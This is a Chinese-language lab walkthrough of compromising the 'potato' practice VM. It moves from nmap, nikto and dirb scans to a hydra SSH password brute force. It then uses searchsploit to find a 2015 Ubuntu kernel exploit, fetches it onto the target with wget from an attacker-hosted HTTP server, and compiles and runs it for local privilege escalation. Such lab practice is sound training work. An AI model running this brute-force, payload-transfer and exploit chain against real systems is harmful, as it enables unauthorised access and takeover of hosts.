靶机练习2之利用Linux版本内核漏洞实现本地权限提升

文章目录

    • 信息收集
      • 1.扫描网段
      • 2.扫描敏感目录
    • 渗透阶段
      • 密码爆破
      • 查看主机内核
      • 查找版本漏洞
      • 查看漏洞详细信息
      • 拷贝漏洞到本地
      • 将漏洞文件传到靶机
      • 漏洞利用

信息收集

1.扫描网段

建议开启两个终端,首尾扫描,提高速度与准确性

从0开始扫描

nmap 10.9.136.0/24

从后面开始扫描

nmap -r 10.9.136.0/24

扫描完成后,发现有个主机 10.9.136.231开放了80端口,直接访问该主机,发现只有一个图片,名字为potato.jpg,记住这个图片名字,或许有用

竟然扫描到了这个靶机,那么接下来进行全面扫描,收集更全面的信息,并且将信息输出到 scan_result.txt文件中

nmap 10.9.136.231 -A -p- -oN scan_result.txt 

发现了一个开放的ssh端口:7120

2.扫描敏感目录

nikto -h http://10.9.136.231

没有发现有用的信息,那使用kali的另外一个扫描工具,也是扫描敏感目录的:

dirb http://10.9.136.231

依旧没有发现有用的东西

渗透阶段

密码爆破

​ 通过以上的信息收集,并没有找到什么有用的信息,仅仅有一张图片的名字potato,靶机IP10.9.136.231,ssh端口7120

那么我们就只能尝试爆破了,因为我们能获得的唯一名字信息就是图片的名字 potato,所以猜出用户名为 potato,使用九头蛇爆破

hydra -l potato -P webshell.txt -V -s 7120 ssh://10.9.136.231

最终爆破出密码:letmein

使用FinalShell连接成功,但是里面的家目录没有什么有用的信息。

查看主机内核

由于连接上 potato 用户之后,查看一些目录,并没有什么有用的信息,因此无法提权,所以只能查看当前主机的版本,看看有没有可利用的漏洞了:

uname -a

image-20230620162949971

经查找,该linux版本为 ubuntu 3.13.0-24

查找版本漏洞

通过主机内核版本,我们可以使用 kalisearchsploit工具查看该主机是否存在漏洞

searchsploit ubuntu 3.13.0-24

靶机练习2之利用Linux版本内核漏洞实现本地权限提升_第1张图片

查看漏洞详细信息

可以看到,该内容存在本地权限提升的漏洞,那么我们就需要将该漏洞下载下来利用,我们可以先通过 searchsploit -p来查看该漏洞的编号信息:

靶机练习2之利用Linux版本内核漏洞实现本地权限提升_第2张图片

拷贝漏洞到本地

发现这是2015年的一个漏洞,我们可以把这个漏洞拷贝到本地,通过 searchsploit -m即可拷贝到本地当前目录:

searchsploit -m 37292

将漏洞文件传到靶机

在kali中打开 http服务

python3 -m http.server 80

在靶机中通过 wget命令下载 漏洞文件

wget http://10.9.136.152/37292.c

漏洞利用

下载之后,可以看到靶机当前目录下一句有这个漏洞文件了,为了方便文件管理,这里先把文件拷贝到 /tmp目录下

cp 37292.c /tmp

然后我们进到 /tmp目录下,由于这个漏洞文件是C语言编写的,所以如果想要执行这个C文件,需要使用 gcc先把文件进行编译:

gcc 37292.c -o exp

这个命令表示将C文件编译,并且将编译后的内容输出到exp中。编译完成之后,我们可以看到当前目录中有了exp文件,,然后输入 ./exp即可执行该文件,从而达到本地权限提升的目的:

./exp

靶机练习2之利用Linux版本内核漏洞实现本地权限提升_第3张图片

你可能感兴趣的:(保护国家网络安全,linux,ubuntu,靶机,本地权限提升漏洞,kali)